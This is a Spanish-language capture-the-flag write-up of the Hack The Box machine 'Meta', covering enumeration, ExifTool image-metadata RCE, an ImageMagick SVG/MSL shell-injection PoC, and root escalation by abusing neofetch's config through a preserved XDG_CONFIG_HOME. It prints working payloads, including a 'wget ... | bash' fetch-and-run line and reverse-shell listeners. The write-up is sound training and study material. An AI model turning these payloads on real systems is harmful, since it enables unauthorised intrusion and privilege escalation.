This page looks best with JavaScript enabled

Hack The Box - Meta

 •  ✍️ sckull
featured image

Tras una enumeración de subdominios encontramos MetaView la cual utiliza una version de ExifTool vulnerable por la cual logramos obtener acceso a la máquina. Tras descubrir un cronjob que ejecuta ImageMagick con una version vulnerable logramos acceder a un segundo usuario. Finalmente escalamos privilegios modificando la variable de configuracion de usuario para neofetch.

Nombre Meta box_img_maker
OS

Linux

Puntos 30
Dificultad Media
IP 10.10.11.140
Maker

Nauten
Matrix 
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[5.9, 5, 5.5, 4.5, 5],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         { 
            "label":"Maker Rate",
            "data":[7, 7, 8, 2, 3],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

Recon

nmap

nmap nos muestra abiertos los puertos: http (80) y ssh (22).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

# Nmap 7.91 scan initiated Sat Jan 22 23:50:19 2022 as: nmap -sS -sV -sC -Pn -p- --min-rate 3000 -oN nmap_scan 10.129.99.144
Warning: 10.129.99.144 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.99.144 (10.129.99.144)
Host is up (0.081s latency).
Not shown: 59823 closed ports, 5710 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 22 23:52:07 2022 -- 1 IP address (1 host up) scanned in 108.65 seconds

Web Site

El sitio web nos redirige a un dominio: artcorp.htb.

1
2
3
4
5
6
7
8

 π ~/htb/meta ❯ curl -sI 10.129.99.144
HTTP/1.1 301 Moved Permanently
Date: Sat, 22 Jan 2022 23:52:10 GMT
Server: Apache
Location: http://artcorp.htb
Content-Type: text/html; charset=UTF-8

 π ~/htb/meta ❯

El sitio web no muestra mucha información.
image

Directory Brute Forcing

feroxbuster muestra recursos del sitio web.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

 π ~/htb/meta ❯ feroxbuster -u http://artcorp.htb/ -w $MD -x php,html,txt --depth 1

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://artcorp.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)7
 🦡  User-Agent            │ feroxbuster/2.3.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [php, html, txt]
 🔃  Recursion Depth       │ 1
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200       86l      263w     4427c http://artcorp.htb/index.html
301        7l       20w      234c http://artcorp.htb/assets
301        7l       20w      231c http://artcorp.htb/css
403        7l       20w      199c http://artcorp.htb/server-status

Subdominios

Ejecutamos ffuf para enumerar los subdominios, descubrimos dev01.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

π ~/htb/meta ❯ ffuf -w bitquark-subdomains-top100000.txt -H "Host: FUZZ.artcorp.htb" -u http://artcorp.htb -fl 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://artcorp.htb
 :: Wordlist         : FUZZ: bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.artcorp.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response lines: 1
________________________________________________

dev01                   [Status: 200, Size: 247, Words: 16, Lines: 10]
:: Progress: [100000/100000] :: Job [1/1] :: 209 req/sec :: Duration: [0:09:27] :: Errors: 0 ::
 π ~/htb/meta ❯

Meta - Exiftool

El sitio web muestra un aplicación en desarrollo.
image

Agrega una dirección.

1
2
3
4
5
6
7
8
9

<!DOCTYPE html>
<html>
<body>
<h2>ArtCorp dev environment</h2>
<p>Currently applications in development:</p>
<p><a href="http://dev01.artcorp.htb/metaview/">MetaView</a></p>
<p>* Only applications ready to be tested are listed</p>
</body>
</html>

La nueva dirección muestra un formulario para subir archivos.
image

Unicamente acepta archivos jpg/png.

1

File not allowed (only jpg/png).

Tras subir una imagen .png vemos los metadatos de la imagen, pareciera ser información de exiftool.
image

Vemos localmente información similar al ejecutar localmente sobre la imagen.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

 π ~/htb/meta ❯ exiftool 5bat.png
ExifTool Version Number         : 12.30
File Name                       : 5bat.png
Directory                       : .
File Size                       : 187 KiB
File Modification Date/Time     : 2016:10:22 12:28:12+00:00
File Access Date/Time           : 2022:02:02 00:19:44+00:00
File Inode Change Date/Time     : 2022:01:23 00:55:00+00:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 700
Image Height                    : 728
Bit Depth                       : 8
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Gamma                           : 2.2
SRGB Rendering                  : Perceptual
Palette                         : (Binary data 768 bytes, use -b option to extract)
Transparency                    : (Binary data 36 bytes, use -b option to extract)
Image Size                      : 700x728
Megapixels                      : 0.510
 π ~/htb/meta ❯ exiftool -ver
12.30

User - www-data

Investigando sobre exiftool, encontramos un post en Hackerone que explica que es posible ejecutar comandos ya que existe un bug en el modulo DjVu. Encontramos un repositorio donde encontramos un archivo de configuración para ejecutar comandos.

Exiftool RCE

Para realizar la explotación debemos de realizar git clone al repositorio de exiftool y utilizar uno de los commits entre las versiones 7.44 a 12.23.

Con ello podemos ejecutar exiftool con el archivo de configuracion (eval.config) pasandole un comando, en este caso un ping a nuestra maquina.

1
2
3
4
5

 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯ ./exiftool -config ../JPEG_RCE/eval.config ../JPEG_RCE/runme.jpg -eval='system("ping -c 3 10.10.14.198")'
    1 image files updated
 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯ ls ../JPEG_RCE/
eval.config  POC.mp4  README.md  runme.jpg  runme.jpg_original
 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯

Tras subir la imagen vemos que el comando se ejecutó.
image

Obtuvimos solicitudes en nuestra máquina.

1
2
3
4
5
6
7
8
9

 π ~/htb/meta ❯ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
00:44:31.504565 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 17794, seq 1, length 64
00:44:31.504604 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 17794, seq 1, length 64
00:44:32.505642 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 17794, seq 2, length 64
00:44:32.505659 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 17794, seq 2, length 64
00:44:33.507040 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 17794, seq 3, length 64
00:44:33.507056 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 17794, seq 3, length 64

Shell

Ejecutamos shells y creamos una nueva imagen para ejecutar una shell inversa.

1
2
3

 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯ ./exiftool -config ../JPEG_RCE/eval.config ../JPEG_RCE/runme.jpg -eval='system("wget -qO- 10.10.14.198/10.10.14.198:1338|bash")'
    1 image files updated
 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯

Con ello logramos obtener una shell como www-data.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

 π ~/htb/meta ❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.198] from artcorp.htb [10.10.11.140] 33682
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@meta:/var/www/dev01.artcorp.htb/metaview$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/dev01.artcorp.htb/metaview
www-data@meta:/var/www/dev01.artcorp.htb/metaview$

Vemos el codigo fuente de la pagina, la función donde ejecuta exiftool sobre la imagen.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

<?php
require 'vendor/autoload.php';

function upload() {
    $output = "";
    if (isset($_FILES["imageUpload"])) {
        $filepath = $_FILES['imageUpload']['tmp_name'];
        $fileSize = filesize($filepath);
        $fileinfo = finfo_open(FILEINFO_MIME_TYPE);
        $filetype = finfo_file($fileinfo, $filepath);

        if ($fileSize === 0 || $fileSize === false) {
            return "The file is empty.";
        }

        if ($fileSize > 2097152) {
            return "The file is too large (max 2MB)";
        }

        $allowedTypes = [
           'image/png' => 'png',
           'image/jpeg' => 'jpg'
        ];

        if (!in_array($filetype, array_keys($allowedTypes))) {
            return "File not allowed (only jpg/png).";
        }

        $filename = basename($filepath);
        $extension = $allowedTypes[$filetype];
        $targetDirectory = __DIR__ . "/uploads";

        $newFilepath = $targetDirectory . "/" . $filename . "." . $extension;

        if (!move_uploaded_file($filepath, $newFilepath)) {
            return "Error during upload.";
        }

        return exiftool_exec($newFilepath);
    }
}

$output = upload();
?>

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta name="description" content="" />
        <meta name="author" content="" />
        <title>MetaView</title>
        <link href="css/bootstrap.min.css" rel="stylesheet" />
        <link href="css/styles.css" rel="stylesheet" />
    </head>

    <body>
        <div id="main_container" class="container h-100 d-flex">
            <div class="jumbotron my-auto">
                <h2>MetaView</h2>
                <p>Upload your image to display related metadata.</p>
                <form action="index.php" method="post" enctype="multipart/form-data">
                    <div class="input-group">
                        <div class="custom-file">
                            <input type="file" name="imageUpload" id="imageUpload" class="custom-file-input"onchange="this.nextElementSibling.innerText = this.files[0].name">
                            <label class="custom-file-label" for="imageUpload">Choose file..</label>
                        </div>
                        <div class="input-group-append">
                            <button type="submit" name="submit" class="btn btn-primary">Upload</button>
                        </div>
                    </div>
                </form>
                <?php if(!empty($output)): ?>
                <div class="mt-3" id="output_data">
                    <pre><?php echo $output; ?></pre>
                </div>
                <?php endif; ?>
            </div>
        </div>
    </body>
</html>

1
2
3
4
5
6

// lib/ExifToolWrapper.php
<?php
    function exiftool_exec($newFilepath) {
        return shell_exec("exiftool " . escapeshellarg($newFilepath) . " --system:all --exiftool:all -e");
    }
?>

User - Thomas

Vemos al usuario thomas en /home, tras enumerar no encontramos información para obtener acceso a este usuario. Ejecutamos pspy, descubrimos que este usuario tiene un cronjob para ejecutar el script convert_images.sh.

1
2
3
4
5
6
7
8

2022/02/01 20:01:01 CMD: UID=0    PID=19551  | /usr/sbin/CRON -f
2022/02/01 20:01:01 CMD: UID=0    PID=19550  | /usr/sbin/CRON -f
2022/02/01 20:01:01 CMD: UID=1000 PID=19552  | /bin/sh -c /usr/local/bin/convert_images.sh
2022/02/01 20:01:01 CMD: UID=1000 PID=19553  | /bin/bash /usr/local/bin/convert_images.sh
2022/02/01 20:01:01 CMD: UID=1000 PID=19554  | /usr/local/bin/mogrify -format png *.*
2022/02/01 20:01:01 CMD: UID=0    PID=19555  | /usr/sbin/CRON -f
2022/02/01 20:01:01 CMD: UID=0    PID=19556  | /bin/sh -c rm /tmp/*
2022/02/01 20:01:01 CMD: UID=1000 PID=19557  | /bin/bash /usr/local/bin/convert_images.sh

El script ejecuta mogrify tomando todas las imagenes en formato .png en el directorio /var/www/dev01.artcorp.htb/convert_images/.

1
2
3
4
5

www-data@meta:/$ cat /usr/local/bin/convert_images.sh
#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify
www-data@meta:/$

Si revisamos este comando es ImageMagick en su version 7.0.10-36.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

www-data@meta:/home/thomas$ which mogrify
/usr/local/bin/mogrify
www-data@meta:/home/thomas$ ls -lah /usr/local/bin/mogrify
lrwxrwxrwx 1 root root 6 Aug 29 15:59 /usr/local/bin/mogrify -> magick
www-data@meta:/home/thomas$ magick -version
Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29 https://imagemagick.org
Copyright: © 1999-2020 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): fontconfig freetype jng jpeg png x xml zlib
www-data@meta:/home/thomas$

searchsploit muestra multiples vulnerabilidades para la version más cercana.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

 π ~/htb/meta ❯ searchsploit ImageMagick
--------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                   |  Path
--------------------------------------------------------------------------------- ---------------------------------
GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion                       | php/webapps/3946.txt
ImageMagick - Memory Leak                                                        | multiple/local/45890.sh
ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)                                | windows/local/31688.pl
ImageMagick 6.9.3-9 / 7.0.1-0 - 'ImageTragick' Delegate Arbitrary Command Execut | multiple/local/39791.rb
ImageMagick 6.x - '.PNM' Image Decoding Remote Buffer Overflow                   | linux/dos/25527.txt
ImageMagick 6.x - '.SGI' Image File Remote Heap Buffer Overflow                  | linux/dos/28383.txt
ImageMagick 7.0.1-0 / 6.9.3-9 - 'ImageTragick ' Multiple Vulnerabilities         | multiple/dos/39767.txt
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
 π ~/htb/meta ❯

ImageMagick - Shell Injection

Tambien encontramos un post de ImageMagick - Shell injection via PDF password donde muestra un PoC de una imagen SVG que permite ejecutar comandos.

1
2
3
4
5
6
7
8
9

<image authenticate='ff" `echo $(id)> ./0wned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

Modificamos el PoC para realizar un ping a nuestra máquina.

1
2
3
4
5
6
7
8
9

<image authenticate='ff" `ping -c 3 10.10.14.198`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="/dev/shm/test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:image.svg" height="100" width="100"/>
  </svg>
</image>

Tras unos segundos obtuvimos multiples pings.

1
2
3
4
5
6
7
8
9

 π ~/htb/meta/www ❯ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
01:19:04.448940 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 19840, seq 1, length 64
01:19:04.448981 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 19840, seq 1, length 64
01:19:05.450592 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 19840, seq 2, length 64
01:19:05.450622 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 19840, seq 2, length 64
01:19:06.451784 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 19840, seq 3, length 64
01:19:06.451819 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 19840, seq 3, length 64

Shell

Agregamos una shell inversa, logrando obtener acceso como thomas y la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

 π ~/htb/meta ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.198] from artcorp.htb [10.10.11.140] 42070
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ whoami;id
thomas
uid=1000(thomas) gid=1000(thomas) groups=1000(thomas)
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ cd
thomas@meta:~$ ls
user.txt
thomas@meta:~$ cat user.txt
90e4234367d020079151cbd9270efca0
thomas@meta:~$

Privesc

Utilizamos la clave privada SSH de thomas para obtener una shell más comoda.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/meta ❯ nano key_thomas
 π ~/htb/meta ❯ chmod 600 key_thomas
 π ~/htb/meta ❯ ssh thomas@10.10.11.140 -i key_thomas
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
thomas@meta:~$

Observamos que puede ejecutar el comando neofetch como root.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

thomas@meta:~$ sudo -l -l
Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
    /usr/bin/neofetch \"\"
thomas@meta:~$

Tras la ejecución muestra información de la máquina.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

thomas@meta:~$ sudo /usr/bin/neofetch
       _,met$$$$$gg.          root@meta
    ,g$$$$$$$$$$$$$$$P.       ---------
  ,g$$P"     """Y$$.".        OS: Debian GNU/Linux 10 (buster) x86_64
 ,$$P'              `$$$.     Host: VMware Virtual Platform None
',$$P       ,ggs.     `$$b:   Kernel: 4.19.0-17-amd64
`d$$'     ,$P"'   .    $$$    Uptime: 7 hours, 9 mins
 $$P      d$'     ,    $$P    Packages: 495 (dpkg)
 $$:      $$.   -    ,d$$'    Shell: bash 5.0.3
 $$;      Y$b._   _,d$P'      CPU: Intel Xeon Gold 5218 (2) @ 2.294GHz
 Y$$.    `.`"Y$$$$P"'         GPU: VMware SVGA II Adapter
 `$$b      "-.__              Memory: 180MiB / 1994MiB
  `Y$$
   `Y$$.
     `$$b.
       `Y$$b.
          `"Y$b._
              `"""

thomas@meta:~$

Si observamos, la variable XDG_CONFIG_HOME esta configurada en sudoers la vemos en el output de sudo -l -l -> env_keep+=XDG_CONFIG_HOME, por lo que podriamos modificarla, vemos en neofecth que este utiliza el archivo de configuración que se encuentra en $HOME/.config del usuario que lo ejecuta.

Al ejecutarlo con sudo utiliza el archivo de configuración que se encuentra en /root/.config, si modificamos la variable XDG_CONFIG_HOME podriamos apuntar a la configuración local de thomas.

Modificamos el archivo de configuración de neofetch.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

thomas@meta:~$ head .config/neofetch/config.conf
# See this wiki page for more info:
# https://github.com/dylanaraps/neofetch/wiki/Customizing-Info
print_info() {
    prin "$(whoami;id)"
    info title
    info underline

    info "OS" distro
    info "Host" model
    info "Kernel" kernel
thomas@meta:~$

Modificamos la variable XDG_CONFIG_HOME y ejecutamos neofetch con sudo, vemos la salida de nuestro comando al inicio.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

thomas@meta:~$ XDG_CONFIG_HOME=/home/thomas/.config sudo /usr/bin/neofetch
       _,met$$$$$gg.          root uid=0(root) gid=0(root) groups=0(root)
    ,g$$$$$$$$$$$$$$$P.       root@meta
  ,g$$P"     """Y$$.".        ---------
 ,$$P'              `$$$.     OS: Debian GNU/Linux 10 (buster) x86_64
',$$P       ,ggs.     `$$b:   Host: VMware Virtual Platform None
`d$$'     ,$P"'   .    $$$    Kernel: 4.19.0-17-amd64
 $$P      d$'     ,    $$P    Uptime: 7 hours, 20 mins
 $$:      $$.   -    ,d$$'    Packages: 495 (dpkg)
 $$;      Y$b._   _,d$P'      Shell: bash 5.0.3
 Y$$.    `.`"Y$$$$P"'         CPU: Intel Xeon Gold 5218 (2) @ 2.294GHz
 `$$b      "-.__              GPU: VMware SVGA II Adapter
  `Y$$                        Memory: 182MiB / 1994MiB
   `Y$$.
     `$$b.
       `Y$$b.
          `"Y$b._
              `"""

thomas@meta:~$

Finalmente agregamos una shell inversa al archivo de configuracion, logrando obtener acceso como root y la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/meta ❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.198] from artcorp.htb [10.10.11.140] 33710
root@meta:/home/thomas# whoami
root
root@meta:/home/thomas# cd /root
root@meta:~# ls
conf
root.txt
root@meta:/home/thomas# cat root.txt
03c068505c7d80bd7c68b4950dbf64a4
root@meta:~#
Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HTB: Meta